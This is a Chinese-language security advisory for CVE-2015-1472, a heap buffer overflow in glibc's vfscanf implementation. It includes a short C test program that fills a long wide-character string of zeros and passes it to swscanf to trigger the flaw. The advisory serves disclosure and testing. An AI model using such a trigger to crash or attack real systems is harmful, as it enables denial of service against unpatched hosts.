发布日期:2015-02-03
更新日期:2015-02-08
受影响系统:
GNU glibc
描述:
BUGTRAQ ID: 72498
CVE(CAN) ID: CVE-2015-1472
glibc是GNU发布的libc库,即c运行库。glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc。
glibc在stdio-common/vfscanf.c的实现上存在堆缓冲区溢出漏洞,目前影响未知。
<*来源:Joseph Myers
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
int
main (void)
{
wchar_t *s = malloc ((SIZE + 1) * sizeof (*s));
if (s == NULL)
abort ();
for (size_t i = 0; i < SIZE; i++)
s[i] = L'0';
s[SIZE] = L'\0';
int i;
if (swscanf (s, L"%d", &i) != 1)
abort ();
if (i != 0)
abort ();
free (s);
return 0;
}
建议:
厂商补丁:
GNU
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
GNU glibc 爆 gethostbyname 缓冲区溢出漏洞